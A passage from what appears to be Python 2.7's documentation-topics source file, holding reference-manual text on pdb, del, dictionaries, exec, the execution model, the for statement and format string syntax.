arguments. When "runcall()" returns, it returns\n whatever the function call returned. The debugger prompt appears\n as soon as the function is entered.\n\npdb.set_trace()\n\n Enter the debugger at the calling stack frame. This is useful to\n hard-code a breakpoint at a given point in a program, even if the\n code is not otherwise being debugged (e.g. when an assertion\n fails).\n\npdb.post_mortem([traceback])\n\n Enter post-mortem debugging of the given *traceback* object. If no\n *traceback* is given, it uses the one of the exception that is\n currently being handled (an exception must be being handled if the\n default is to be used).\n\npdb.pm()\n\n Enter post-mortem debugging of the traceback found in\n "sys.last_traceback".\n\nThe "run*" functions and "set_trace()" are aliases for instantiating\nthe "Pdb" class and calling the method of the same name. If you want\nto access further features, you have to do this yourself:\n\nclass pdb.Pdb(completekey=\'tab\', stdin=None, stdout=None, skip=None)\n\n "Pdb" is the debugger class.\n\n The *completekey*, *stdin* and *stdout* arguments are passed to the\n underlying "cmd.Cmd" class; see the description there.\n\n The *skip* argument, if given, must be an iterable of glob-style\n module name patterns. The debugger will not step into frames that\n originate in a module that matches one of these patterns. [1]\n\n Example call to enable tracing with *skip*:\n\n import pdb; pdb.Pdb(skip=[\'django.*\']).set_trace()\n\n New in version 2.7: The *skip* argument.\n\n run(statement[, globals[, locals]])\n runeval(expression[, globals[, locals]])\n runcall(function[, argument, ...])\n set_trace()\n\n See the documentation for the functions explained above.\n', 'del': u'\nThe "del" statement\n*******************\n\n del_stmt ::= "del" target_list\n\nDeletion is recursively defined very similar to the way assignment is\ndefined. 
Rather than spelling it out in full details, here are some\nhints.\n\nDeletion of a target list recursively deletes each target, from left\nto right.\n\nDeletion of a name removes the binding of that name from the local or\nglobal namespace, depending on whether the name occurs in a "global"\nstatement in the same code block. If the name is unbound, a\n"NameError" exception will be raised.\n\nIt is illegal to delete a name from the local namespace if it occurs\nas a free variable in a nested block.\n\nDeletion of attribute references, subscriptions and slicings is passed\nto the primary object involved; deletion of a slicing is in general\nequivalent to assignment of an empty slice of the right type (but even\nthis is determined by the sliced object).\n', 'dict': u'\nDictionary displays\n*******************\n\nA dictionary display is a possibly empty series of key/datum pairs\nenclosed in curly braces:\n\n dict_display ::= "{" [key_datum_list | dict_comprehension] "}"\n key_datum_list ::= key_datum ("," key_datum)* [","]\n key_datum ::= expression ":" expression\n dict_comprehension ::= expression ":" expression comp_for\n\nA dictionary display yields a new dictionary object.\n\nIf a comma-separated sequence of key/datum pairs is given, they are\nevaluated from left to right to define the entries of the dictionary:\neach key object is used as a key into the dictionary to store the\ncorresponding datum. This means that you can specify the same key\nmultiple times in the key/datum list, and the final dictionary\'s value\nfor that key will be the last one given.\n\nA dict comprehension, in contrast to list and set comprehensions,\nneeds two expressions separated with a colon followed by the usual\n"for" and "if" clauses. When the comprehension is run, the resulting\nkey and value elements are inserted in the new dictionary in the order\nthey are produced.\n\nRestrictions on the types of the key values are listed earlier in\nsection The standard type hierarchy. (To summarize, the key type\nshould be *hashable*, which excludes all mutable objects.) Clashes\nbetween duplicate keys are not detected; the last datum (textually\nrightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': u'\nInteraction with dynamic features\n*********************************\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. 
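For example (the dictionary contents are illustrative only):\n\n   ns = {\'x\': 1}\n   print eval(\'x + 1\', ns)                # 2\n   exec \'y = x * 10\' in ns\n   print ns[\'y\']                          # 10\n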
If only one namespace is\nspecified, it is used for both.\n', 'else': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'exceptions': u'\nExceptions\n**********\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exec': u'\nThe "exec" statement\n********************\n\n exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n\nThis statement supports dynamic execution of Python code. The first\nexpression should evaluate to either a Unicode string, a *Latin-1*\nencoded string, an open file object, a code object, or a tuple. 
If it\nis a string, the string is parsed as a suite of Python statements\nwhich is then executed (unless a syntax error occurs). [1] If it is an\nopen file, the file is parsed until EOF and executed. If it is a code\nobject, it is simply executed. For the interpretation of a tuple, see\nbelow. In all cases, the code that\'s executed is expected to be valid\nas file input (see section File input). Be aware that the "return"\nand "yield" statements may not be used outside of function definitions\neven within the context of code passed to the "exec" statement.\n\nIn all cases, if the optional parts are omitted, the code is executed\nin the current scope. If only the first expression after "in" is\nspecified, it should be a dictionary, which will be used for both the\nglobal and the local variables. If two expressions are given, they\nare used for the global and local variables, respectively. If\nprovided, *locals* can be any mapping object. Remember that at module\nlevel, globals and locals are the same dictionary. If two separate\nobjects are given as *globals* and *locals*, the code will be executed\nas if it were embedded in a class definition.\n\nThe first expression may also be a tuple of length 2 or 3. In this\ncase, the optional parts must be omitted. The form "exec(expr,\nglobals)" is equivalent to "exec expr in globals", while the form\n"exec(expr, globals, locals)" is equivalent to "exec expr in globals,\nlocals". The tuple form of "exec" provides compatibility with Python\n3, where "exec" is a function rather than a statement.\n\nChanged in version 2.4: Formerly, *locals* was required to be a\ndictionary.\n\nAs a side effect, an implementation may insert additional keys into\nthe dictionaries given besides those corresponding to variable names\nset by the executed code. For example, the current implementation may\nadd a reference to the dictionary of the built-in module "__builtin__"\nunder the key "__builtins__" (!).\n\n**Programmer\'s hints:** dynamic evaluation of expressions is supported\nby the built-in function "eval()". The built-in functions "globals()"\nand "locals()" return the current global and local dictionary,\nrespectively, which may be useful to pass around for use by "exec".\n\n-[ Footnotes ]-\n\n[1] Note that the parser only accepts the Unix-style end of line\n convention. If you are reading the code from a file, make sure to\n use *universal newlines* mode to convert Windows or Mac-style\n newlines.\n', 'execmodel': u'\nExecution model\n***************\n\n\nNaming and binding\n==================\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line as the first argument) is a code\nblock. A script command (a command specified on the interpreter\ncommand line with the \'**-c**\' option) is a code block. The file read\nby the built-in function "execfile()" is a code block. The string\nargument passed to the built-in function "eval()" and to the "exec"\nstatement is a code block. 
The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". 
The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n---------------------------------\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n\n\nExceptions\n==========\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). 
A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exprlists': u'\nExpression lists\n****************\n\n expression_list ::= expression ( "," expression )* [","]\n\nAn expression list containing at least one comma yields a tuple. The\nlength of the tuple is the number of expressions in the list. The\nexpressions are evaluated from left to right.\n\nThe trailing comma is required only to create a single tuple (a.k.a. a\n*singleton*); it is optional in all other cases. A single expression\nwithout a trailing comma doesn\'t create a tuple, but rather yields the\nvalue of that expression. (To create an empty tuple, use an empty pair\nof parentheses: "()".)\n', 'floating': u'\nFloating point literals\n***********************\n\nFloating point literals are described by the following lexical\ndefinitions:\n\n floatnumber ::= pointfloat | exponentfloat\n pointfloat ::= [intpart] fraction | intpart "."\n exponentfloat ::= (intpart | pointfloat) exponent\n intpart ::= digit+\n fraction ::= "." digit+\n exponent ::= ("e" | "E") ["+" | "-"] digit+\n\nNote that the integer and exponent parts of floating point numbers can\nlook like octal integers, but are interpreted using radix 10. For\nexample, "077e010" is legal, and denotes the same number as "77e10".\nThe allowed range of floating point literals is implementation-\ndependent. Some examples of floating point literals:\n\n 3.14 10. 
.001 1e100 3.14e-10 0e0\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator "-" and the\nliteral "1".\n', 'for': u'\nThe "for" statement\n*******************\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n', 'formatstrings': u'\nFormat String Syntax\n********************\n\nThe "str.format()" method and the "Formatter" class share the same\nsyntax for format strings (although in the case of "Formatter",\nsubclasses can define their own format string syntax).\n\nFormat strings contain "replacement fields" surrounded by curly braces\n"{}". Anything that is not contained in braces is considered literal\ntext, which is copied unchanged to the output. If you need to include\na brace character in the literal text, it can be escaped by doubling:\n"{{" and "}}".\n\nThe grammar for a replacement field is as follows:\n\n replacement_field ::= "{" [field_name] ["!" conversion] [":" format_spec] "}"\n field_name ::= arg_name ("." 
attribute_name | "[" element_index "]")*\n arg_name ::= [identifier | integer]\n attribute_name ::= identifier\n element_index ::= integer | index_string\n index_string ::= <any source character except "]"> +\n conversion ::= "r" | "s"\n format_spec ::= <described in the next section>\n\nIn less formal terms, the replacement field can start with a\n*field_name* that specifies the object whose value is to be formatted\nand inserted into the output instead of the replacement field. The\n*field_name* is optionally followed by a *conversion* field, which is\npreceded by an exclamation point "\'!\'", and a *format_spec*, which is\npreceded by a colon "\':\'". These specify a non-default format for the\nreplacement value.\n\nSee also the Format Specification Mini-Language section.\n\nThe *field_name* itself begins with an *arg_name* that is either a\nnumber or a keyword. If it\'s a number, it refers to a positional\nargument, and if it\'s a keyword, it refers to a named keyword\nargument. If the numerical arg_names in a format string are 0, 1, 2,\n... in sequence, they can all be omitted (not just some) and the\nnumbers 0, 1, 2, ... will be automatically inserted in that order.\nBecause *arg_name* is not quote-delimited, it is not possible to\nspecify arbitrary dictionary keys (e.g., the strings "\'10\'" or\n"\':-]\'") within a format string. The *arg_name* can be followed by any\nnumber of index or attribute expressions. An expression of the form\n"\'.name\'" selects the named attribute using "getattr()", while an\nexpression of the form "\'[index]\'" does an index lookup using\n"__getitem__()".\n\nChanged in version 2.7: The positional argument specifiers can be\nomitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n\nSome simple format string examples:\n\n "First, thou shalt count to {0}" # References first positional argument\n "Bring me a {}" # Implicitly references the first positional argument\n "From {} to {}" # Same as "From {0} to {1}"\n "My quest is {name}" # References keyword argument \'name\'\n "Weight in tons {0.weight}" # \'weight\' attribute of first positional arg\n "Units destroyed: {players[0]}" # First element of keyword argument \'players\'.\n\nThe *conversion* field causes a type coercion before formatting.\nNormally, the job of formatting a value is done by the "__format__()"\nmethod of the value itself. However, in some cases it is desirable to\nforce a type to be formatted as a string, overriding its own\ndefinition of formatting. By converting the value to a string before\ncalling "__format__()", the normal formatting logic is bypassed.\n\nTwo conversion flags are currently supported: "\'!s\'" which calls\n"str()" on the value, and "\'!r\'" which calls "repr()".\n\nSome examples:\n\n "Harold\'s a clever {0!s}" # Calls str() on the argument first\n "Bring out the holy {name!r}" # Calls repr() on the argument first\n\nThe *format_spec* field contains a specification of how the value\nshould be presented, including such details as field width, alignment,\npadding, decimal precision and so on. Each value type can define its\nown "formatting mini-language" or interpretation of the *format_spec*.\n\nMost built-in types support a common formatting mini-language, which\nis described in the next section.\n\nA *format_spec* field can also include nested replacement fields\nwithin it. These nested replacement fields can contain only a field\nname; conversion flags and format specifications are not allowed. 
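For example (the argument values are illustrative only):\n\n   >>> \'{0:{1}}\'.format(\'x\', 6)           # the width is itself an argument\n   \'x     \'\n   >>> \'{:>{w}}\'.format(3.14, w=8)\n   \'    3.14\'\n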
The\nreplacement fields within the format_spec are substituted before the\n*format_spec* string is interpreted. This allows the formatting of a\nvalue to be dynamically specified.\n\nSee the Format examples section for some examples.\n\n\nFormat Specification Mini-Language\n==================================\n\n"Format specifications" are used within replacement fields contained\nwithin a format string to define how individual values are presented\n(see Format String Syntax). They can also be passed directly to the\nbuilt-in "format()" function. Each formattable type may define how\nthe format specification is to be interpreted.\n\nMost built-in types implement the following options for format\nspecifications, although some of the formatting options are only\nsupported by the numeric types.\n\nA general convention is that an empty format string ("""") produces\nthe same result as if you had called "str()" on the value. A non-empty\nformat string typically modifies the result.\n\nThe general form of a *standard format specifier* is:\n\n format_spec ::= [[fill]align][sign][#][0][width][,][.precision][type]\n fill ::= <any character>\n align ::= "<" | ">" | "=" | "^"\n sign ::= "+" | "-" | " "\n width ::= integer\n precision ::= integer\n type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" | "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n\nIf a valid *align* value is specified, it can be preceded by a *fill*\ncharacter that can be any character and defaults to a space if\nomitted. Note that it is not possible to use "{" and "}" as *fill*\nchar while using the "str.format()" method; this limitation however\ndoesn\"t affect the "format()" function.\n\nThe meaning of the various alignment options is as follows:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\"<\"" | Forces the field to be left-aligned within the available |\n | | space (this is the default for most objects). |\n +-----------+------------------------------------------------------------+\n | "\">\"" | Forces the field to be right-aligned within the available |\n | | space (this is the default for numbers). |\n +-----------+------------------------------------------------------------+\n | "\"=\"" | Forces the padding to be placed after the sign (if any) |\n | | but before the digits. This is used for printing fields |\n | | in the form \"+000000120\". This alignment option is only |\n | | valid for numeric types. |\n +-----------+------------------------------------------------------------+\n | "\"^\"" | Forces the field to be centered within the available |\n | | space. |\n +-----------+------------------------------------------------------------+\n\nNote that unless a minimum field width is defined, the field width\nwill always be the same size as the data to fill it, so that the\nalignment option has no meaning in this case.\n\nThe *sign* option is only valid for number types, and can be one of\nthe following:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\"+\"" | indicates that a sign should be used for both positive as |\n | | well as negative numbers. |\n +-----------+------------------------------------------------------------+\n | "\"-\"" | indicates that a sign should be used only for negative |\n | | numbers (this is the default behavior). 
|\n +-----------+------------------------------------------------------------+\n | space | indicates that a leading space should be used on positive |\n | | numbers, and a minus sign on negative numbers. |\n +-----------+------------------------------------------------------------+\n\nThe "\"#\"" option is only valid for integers, and only for binary,\noctal, or hexadecimal output. If present, it specifies that the\noutput will be prefixed by "\"0b\"", "\"0o\"", or "\"0x\"", respectively.\n\nThe "\",\"" option signals the use of a comma for a thousands separator.\nFor a locale aware separator, use the "\"n\"" integer presentation type\ninstead.\n\nChanged in version 2.7: Added the "\",\"" option (see also **PEP 378**).\n\n*width* is a decimal integer defining the minimum field width. If not\nspecified, then the field width will be determined by the content.\n\nPreceding the *width* field by a zero ("\"0\"") character enables sign-\naware zero-padding for numeric types. This is equivalent to a *fill*\ncharacter of "\"0\"" with an *alignment* type of "\"=\"".\n\nThe *precision* is a decimal number indicating how many digits should\nbe displayed after the decimal point for a floating point value\nformatted with "\"f\"" and "\"F\"", or before and after the decimal point\nfor a floating point value formatted with "\"g\"" or "\"G\"". For non-\nnumber types the field indicates the maximum field size - in other\nwords, how many characters will be used from the field content. The\n*precision* is not allowed for integer values.\n\nFinally, the *type* determines how the data should be presented.\n\nThe available string presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"s\"" | String format. This is the default type for strings and |\n | | may be omitted. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\"s\"". |\n +-----------+------------------------------------------------------------+\n\nThe available integer presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"b\"" | Binary format. Outputs the number in base 2. |\n +-----------+------------------------------------------------------------+\n | "\"c\"" | Character. Converts the integer to the corresponding |\n | | unicode character before printing. |\n +-----------+------------------------------------------------------------+\n | "\"d\"" | Decimal Integer. Outputs the number in base 10. |\n +-----------+------------------------------------------------------------+\n | "\"o\"" | Octal format. Outputs the number in base 8. |\n +-----------+------------------------------------------------------------+\n | "\"x\"" | Hex format. Outputs the number in base 16, using lower- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\"X\"" | Hex format. Outputs the number in base 16, using upper- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\"n\"" | Number. This is the same as "\"d\"", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. 
|\n +-----------+------------------------------------------------------------+\n | None | The same as "\"d\"". |\n +-----------+------------------------------------------------------------+\n\nIn addition to the above presentation types, integers can be formatted\nwith the floating point presentation types listed below (except "\"n\""\nand None). When doing so, "float()" is used to convert the integer to\na floating point number before formatting.\n\nThe available presentation types for floating point and decimal values\nare:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\"e\"" | Exponent notation. Prints the number in scientific |\n | | notation using the letter \"e\" to indicate the exponent. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"E\"" | Exponent notation. Same as "\"e\"" except it uses an upper |\n | | case \"E\" as the separator character. |\n +-----------+------------------------------------------------------------+\n | "\"f\"" | Fixed point. Displays the number as a fixed-point number. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"F\"" | Fixed point. Same as "\"f\"". |\n +-----------+------------------------------------------------------------+\n | "\"g\"" | General format. For a given precision "p >= 1", this |\n | | rounds the number to "p" significant digits and then |\n | | formats the result in either fixed-point format or in |\n | | scientific notation, depending on its magnitude. The |\n | | precise rules are as follows: suppose that the result |\n | | formatted with presentation type "\"e\"" and precision "p-1" |\n | | would have exponent "exp". Then if "-4 <= exp < p", the |\n | | number is formatted with presentation type "\"f\"" and |\n | | precision "p-1-exp". Otherwise, the number is formatted |\n | | with presentation type "\"e\"" and precision "p-1". In both |\n | | cases insignificant trailing zeros are removed from the |\n | | significand, and the decimal point is also removed if |\n | | there are no remaining digits following it. Positive and |\n | | negative infinity, positive and negative zero, and nans, |\n | | are formatted as "inf", "-inf", "0", "-0" and "nan" |\n | | respectively, regardless of the precision. A precision of |\n | | "0" is treated as equivalent to a precision of "1". The |\n | | default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\"G\"" | General format. Same as "\"g\"" except switches to "\"E\"" if |\n | | the number gets too large. The representations of infinity |\n | | and NaN are uppercased, too. |\n +-----------+------------------------------------------------------------+\n | "\"n\"" | Number. This is the same as "\"g\"", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | "\"%\"" | Percentage. Multiplies the number by 100 and displays in |\n | | fixed ("\"f\"") format, followed by a percent sign. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\"g\"". 
|\n +-----------+------------------------------------------------------------+\n\n\nFormat examples\n===============\n\nThis section contains examples of the new format syntax and comparison\nwith the old "%"-formatting.\n\nIn most of the cases the syntax is similar to the old "%"-formatting,\nwith the addition of the "{}" and with ":" used instead of "%". For\nexample, "\'%03.2f\'" can be translated to "\'{:03.2f}\'".\n\nThe new format syntax also supports new and different options, shown\nin the following examples.\n\nAccessing arguments by position:\n\n   >>> \'{0}, {1}, {2}\'.format(\'a\', \'b\', \'c\')\n   \'a, b, c\'\n   >>> \'{}, {}, {}\'.format(\'a\', \'b\', \'c\')  # 2.7+ only\n   \'a, b, c\'\n   >>> \'{2}, {1}, {0}\'.format(\'a\', \'b\', \'c\')\n   \'c, b, a\'\n   >>> \'{2}, {1}, {0}\'.format(*\'abc\')      # unpacking argument sequence\n   \'c, b, a\'\n   >>> \'{0}{1}{0}\'.format(\'abra\', \'cad\')   # arguments\' indices can be repeated\n   \'abracadabra\'\n\nAccessing arguments by name:\n\n   >>> \'Coordinates: {latitude}, {longitude}\'.format(latitude=\'37.24N\', longitude=\'-115.81W\')\n   \'Coordinates: 37.24N, -115.81W\'\n   >>> coord = {\'latitude\': \'37.24N\', \'longitude\': \'-115.81W\'}\n   >>> \'Coordinates: {latitude}, {longitude}\'.format(**coord)\n   \'Coordinates: 37.24N, -115.81W\'\n\nAccessing arguments\' attributes:\n\n   >>> c = 3-5j\n   >>> (\'The complex number {0} is formed from the real part {0.real} \'\n   ...  \'and the imaginary part {0.imag}.\').format(c)\n   \'The complex number (3-5j) is formed from the real part 3.0 and the imaginary part -5.0.\'\n   >>> class Point(object):\n   ...     def __init__(self, x, y):\n   ...         self.x, self.y = x, y\n   ...     def __str__(self):\n   ...         return \'Point({self.x}, {self.y})\'.format(self=self)\n   ...\n   >>> str(Point(4, 2))\n   \'Point(4, 2)\'\n\nAccessing arguments\' items:\n\n   >>> coord = (3, 5)\n   >>> \'X: {0[0]}; Y: {0[1]}\'.format(coord)\n   \'X: 3; Y: 5\'\n\nReplacing "%s" and "%r":\n\n   >>> "repr() shows quotes: {!r}; str() doesn\'t: 